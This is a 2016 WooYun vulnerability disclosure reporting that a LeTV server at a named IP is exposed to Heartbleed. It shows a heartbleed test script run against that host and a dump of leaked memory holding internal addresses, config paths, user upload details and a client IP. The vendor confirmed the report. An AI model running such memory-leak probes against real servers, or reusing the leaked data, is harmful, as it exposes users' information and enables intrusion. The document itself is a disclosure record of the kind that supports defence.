当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0197043

漏洞标题:乐视某服务器漏洞

相关厂商:乐视网

漏洞作者: 路人甲

提交时间:2016-04-16 15:57

修复时间:2016-05-31 22:20

公开时间:2016-05-31 22:20

漏洞类型:系统/服务补丁不及时

危害等级:高

自评Rank:12

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-04-16: 细节已通知厂商并且等待厂商处理中
2016-04-16: 厂商已经确认,细节仅向厂商公开
2016-04-26: 细节向核心白帽子及相关领域专家公开
2016-05-06: 细节向普通白帽子公开
2016-05-16: 细节向实习白帽子公开
2016-05-31: 细节向公众公开

简要描述:

乐视

详细说明:


站点:
https://220.181.1.131/

l1.png


查看证书颁发:

l2.png


存在心脏出血漏洞,可以直接读取服务器内存数据

l3.png


C:\Python27\heartbleed-master-x>python hb-test.py 220.181.1.131
[+] Connecting...
[+] Sending ClientHello for TLSv1.0
[+] Waiting for Server Hello...
[+] Reveiced ServerHello for TLSv1.0
[+] Sending heartbeat request...
[+] Received heartbeat response:
.@....SC[...r....+..H...9..w.3....f.....".!.9.8...5.....3.2.....E.D...../...A...I.....4.2...#...#...
.. .#..... .=^%...D..1(i.J..3t..uO5..q....l.4.:..u.I._...S..U...Y}..5)k..]+..Y.K.fd.r....mB..R..u.U.
..|...ECy.cQ....KYx..c..0.....". .0a.EJ.]@.....!.!....p!.!..r.....{"group_name":"group104","host":"1
0.140.80.63","port":23000}.j82289492...!..P-P-....P-P=..r.P-g&fileid=dcd3375application/octet-stream
.%...#.#.....".#..HTTP/1.1 200 OK..Server: openresty..Date: Tue, 29 Mar 2016 21:45:13 GMT..Content-T
ype: application/octet-stream..Transfer-Encoding: chunked..Connection: close..Access-Control-Allow-O
rigin: *..Access-Control-Allow-Headers: Origin,X-Requested-With,Content-Type,Accept..Access-Control-
Allow-Methods: GET,POST,OPTIONS.`"r.....b.N. !0&.$...$.$.....$.$.6r.....3d.....M..L...-.!.g%x$.6r$.#
!P%.%`%...%.$.6r%p%[30/Mar/2016:05:45:13 +0800] ++ [0.004] ++ [200] ++ [POST /x/fs/getstorage HTTP/
1.1] ++ [10.140.120.45] ++ [-] ++ [resty.http/0.2] ++ [-]...3v....N.P..s!qz.T.ku...a....rn8..@3...O.
..*Wg.QO..zP..^.h...=h....X...V'.E..E...\.oZ/...n..?...S.Wq.'.d..I..n6k.q..P.~@.H^...9...a.N.. ;....
^.....n1!..B].<`A..Rz....#s.C..kd....v.....#9.O..c..).j.:e,.UYpE8hD...9;..lP.....@.&HL.\!)Wmx.f5=8.?
^s,..1gH.0...Ap(...q9k....9../.ETu.4.6J..a..UZP..5..`..EJ.....X(..(..A....P..@8\Xb..0.....&fdfs_resp
_status=0&fdfs_resp_status=0;....)&fdfs_resp_status=0]1.z....0H.8a..filename=07.mkv&size=252586286&u
ploadid=160330398822&appkey=disk&chip=9&fileid=a693117d7242d3f8a32c02ff4a72b9e89a20b66f&version=2&st
atus=200&node=3001....h..+....`+s+....`+s+..&fdfs_resp_status=0..zp./uss/x/ctrl/update/single.;.mSR.
filename=07.mkv&size=252586286&uploadid=160330398822&appkey=disk&chip=9&fileid=a693117d7242d3f8a32c0
2ff4a72b9e89a20b66f&version=2&status=200&node=3001.. /..content-length..19...lqi..W.U.2.....hostacce
ptcontent-typecontent-dispositioncontent-rangesession-id....19L.4.w"}[}[....hZ}[...,.=..A.....>....8
0.63...Y.. /.EJ.@\A-X(HTTP@.....@4(..$....E.E..V = e.../.S....0... e0S...S.S...006....0... e....H=?^
..S^..H*..P..V....4.....x+...+....KyN.....pe`...p-.....eG..9...,....D....n...~..connectionngth.c|c~c
.c ;...-..._.....6r5...;h6.6x6@..6H..6.6x7.6.6r.....x7.6[30/Mar/2016:05:44:36 +0800] ++ [7.664] ++ [
200] ++ [POST /x/api/upload?mltag=1&filename=IMG_20160328_122215.jpg&fileid=cc02f9fa4f75e7f0798873f3
63ca8e2501d6fbcd&uploadid=160330420253&node=3001&size=4043177&chipsize=2021589&appkey=album_v2&uploa
dday=1459287850.675&chip=2&fstart=2021589&fstop=4043176&mltag=1 HTTP/1.1] ++ [123.181.191.81] ++ [-]
++ [Android Upload] ++ [-]...user-agenttecontent-lengthconnectionhost.7....o>.....-...3.....0.....,
.b.b..m...m...t...8.N.P.@.@...0\ikG..... /..D..... /X..qr.H@`.`... e.3..H....^..s+s+....`+s+!..<...[
..8... e200 OK.. 1.....>.>.pC..p.....0...{.X..3.%...\].$....r.....v.DOL.....^..n....7..D.]a~..|1;.Q
..Y..Yp.b...#'.H.....C...J.K.hy.HwuWJ.\&.U& .-.n.....5.|."...xY}..5$.~....(....U....0.$.....5.-.....
`~....}..n.aY..n..A.....m...|D.UW..%.N$....z<'8.x!.S..D...V.g/.g...n.5..j.T.....@...e{r.7^.W..'....=
..,.}.<.N.).j>..o..T...]...!...gO.C...<M._....r.....%.....dt.f:_..b.E}..z.t[....R<..~..2l.z...xi.M.0
%.r.T...lG.._..mv?SQ..E..~....~T....s..A.A.....A.A..r.....{"group_name":"group111","host":"10.140.80
.110","port":23000}.A9477740...A..`M`M....`M`]..r.`M...H.....@.V.?.kapplication/octet-stream.E...C.C
.....B.C..HTTP/1.1 200 OK..Server: openresty..Date: Tue, 29 Mar 2016 21:44.&{.=.....6.N%.....`.....%
.EJC...k'@.....X'@.c.k..0...../letv/ups/openresty/nginx/ups_ngx_conf/x/fs_upload_pass.lua.pC..mltag=
1&filename=IMG_20160315_185943.jpg&fileid=a26acfc21180522f9c560925ee5c49f6612e9583&uploadid=16033039
7781&node=3001&size=3372836&chipsize=1686418&appkey=album_v2&uploadday=1459285914.675&chip=2&fstart=
1686418&fstop=3372835&mltag=1.....&fdfs_resp_status=06:05:....1 +0pF&fdfs_resp_status=0 [POS..../fs/
.F&fdfs_resp_status=0.140...`O,..i.oncontefilename=IMG_20160315_185943.jpg&size=3372836&uploadid=160
330397781&appkey=album_v2&chip=2&fileid=a26acfc21180522f9c560925ee5c49f6612e9583&version=2&status=20
0&node=3001G.....H+H.....H+H..&fdfs_resp_status=0...../uss/x/ctrl/updateE.....filename=IMG_20160315_
185943.jpg&size=3372836&uploadid=160330397781&appkey=album_v2&chip=2&fileid=a26acfc21180522f9c560925
ee5c49f6612e9583&version=2&status=200&node=3001.+IJ...M.EJ..cAI.C...`[...I..xg.....M..content-length
..19.O....user-agentcontent-typehostconnectionaccept-encodingcontent-dispositioncontent-rangesession
-id.200 OKaccept00..p]p].]..HTTPAJ(..$....E.E..].bpp...NpV....0...pp0W`W...V..pV.V.....W..hO.R....0.
..pp....TM.e...e..,G..M..V....-.p...0H..HHu...KyN.o....p.%...H.....eG.0Z..0M....D....n...~..connecti
onngth&n.n.n&n....=utf-8.content-typeContent-Length.313.content-lengthConnection.close.connection`..
..P9....N...!_!_....P]P..qr..Jr.....b.N.....x.{"code":2000,"result":{"size":"528301","uploadid":"160
330420146","upload":2,"downloadUrl":"http:\/\/cloud.letv.com\/uss\/download\/de6a78a18f8e5a81cce3da0
205c613270db996c1","fileid":"de6a78a18f8e5a81cce3da0205c613270db996c1","mime":"image\/jpeg","progres
s":"100","appkey":"disk","nodeId":"3001","complete":true}}..i..-..@.{"code":2000,"result":{"size":"5
28301","uploadid.&{.=.....6.N..L.L....JY....yL.`....6$....2.5..L..'.y...0..L.~...Lx$..]...!..Lc.w...
%. ..L.b..`...`..M.#.c..}....M","fileid":"de6a78a18f8e5a81cce3da0205c613270db996c1","mime":"image\/j
peg","complete":true,"progress":"100.00","nodeId":"3001","upload":2}}..;}.....r.....b.N.....02XY...Y
.Y.....Y.Y.6r.....13c....Ze*I.c.Ad...z..#..YHY.6r.....XY.v...e.....0.....].m.m..m...m...t...8.N...A.
A....cikGM..DMX..qr.,@`.`...pp.d..,...0f..19p..ec.2.8.$.=..ZQ?....kbkb....Hakb


读内存的东西应该可以确定是乐视的服务器的
downloadUrl":"http://cloud.letv.com/uss/download.....
网站路径
letv/ups/openresty/nginx/ups_ngx_conf/x/fs_upload_pass
只要不断抓取内存可以抓取可以抓取更多。。。。。

漏洞证明:

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2016-04-16 22:12

厂商回复:

感谢关注乐视安全。

最新状态:

暂无


漏洞评价:

评价